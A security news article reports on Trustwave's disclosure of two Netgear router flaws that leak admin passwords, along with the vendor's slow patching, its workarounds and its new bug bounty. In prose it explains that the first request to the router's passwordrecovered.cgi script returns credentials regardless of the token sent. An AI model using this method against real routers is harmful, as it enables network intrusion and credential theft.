Hundreds of thousands–potentially more than one million–Netgear routers are susceptible to a pair of vulnerabilities that can lead to password disclosure.
Researchers said that while anyone who has physical access to a router can exploit the vulnerabilities locally, the real threat is that the flaw can also be exploited remotely.
According to Simon Kenin, a security researcher with Trustwave’s Spiderlabs team, who discovered the flaw and disclosed it Monday, the vulnerabilities can be remotely exploited if the router’s remote management option is enabled.
While Netgear claims remote management is turned off on routers by default, Kenin said there are “hundreds of thousands, if not over a million” devices left remotely accessible.
Kenin claims that all he had to do was send a simple request to the router’s web management server to retrieve a router’s password. After determining a number that corresponds to a password recovery token, he found he could pair it with a call to the router’s passwordrecovered.cgi script. Kenin claims he made his discovery by leveraging two exploits disclosed in 2014 on some Netgear routers he had hanging around.
It wasn’t until after Kenin pieced together a python script designed to diagnose the scope of the issue that he determined he could still retrieve the router’s credentials even if he didn’t send the correct password recovery token.
“After few trials and errors trying to reproduce the issue, I found that the very first call to passwordrecovered.cgi will give out the credentials no matter what the parameter you send. This is totally new bug that I haven’t seen anywhere else. When I tested both bugs on different NETGEAR models, I found that my second bug works on a much wider range of models,” Kenin wrote Monday.
Kenin’s employer, Trustwave, divulged details around both vulnerabilities in a lengthy blog post Monday, putting the wraps on a nearly year-long odyssey with the vendor.
The firm first disclosed the vulnerability to Netgear in April 2016, initially it listing 18 vulnerable models, before listing 25 vulnerable models in a subsequent advisory. After repeated requests for an update on a fix for the vulnerability, Netgear finally obliged in July and provided firmware updates for a fraction of the affected routers.
It wasn’t until this weekend that Netgear acknowledged the issues again, posting an updated version of the article on its support page, instructing users to find and download the appropriate firmware fixes. The most recent version of the advisory claims there are 31 vulnerable models, 18 of which are patched.
The company is encouraging users of some devices in which firmware is not available to implement a workaround. According to Netgear, users of 12 different models would be best served to manually enable password recovery and disable remote management on their devices.
“The potential for password exposure remains if you do not complete both steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification,” the company writes.
It’s the first critical vulnerability to affect Netgear routers this year but the second in the last two months. In December, it was discovered that a handful of the company’s Nighthawk line of routers were vulnerable to a flaw that could have given an attacker root access on the device and allowed them to run remote code. The company was quick to release beta firmware updates to address the vulnerability but simultaneously confirmed that more routers than originally reported were vulnerable.
When reached Wednesday, a Netgear spokesperson said it was aware of the vulnerability and that it was appreciative of the research Trustwave carried out.
“NETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR. It is NETGEAR’s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.”
The router manufacturer is using the most recent incident to tout its fairly new bug bounty program. Netgear partnered with Bugcrowd at the beginning of the year and said it will dole out between $150 and $15,000 per bug.
Kenin and Trustwave learned of the company’s new bug bounty plan just prior to publishing their findings back in December, something that helped assuage any fears of the bugs not getting patched.
“We fully expect this move will not only smooth the relationship between third-party researchers and NETGEAR, but, in the end, will result in a more secure line of products and services.”
Kenin points out that in the wake of Mirai, having the admin password for a router can cause a lot of damage. In addition to giving an attacker access to the network, it allows them to cherry pick any devices that may using the same admin password connected to it.
“As many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password,” Kenin wrote Monday.
“With malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well. If running a bot is not possible, the DNS can be easily changed to a rogue one, as described by Proofpoint, to further infect machines on the network,” he added.
Kafeine, a researcher with Proofpoint, warned last month that attackers were using the DNSChanger exploit kit in man-in-the-middle attacks and to change the DNS records for routers.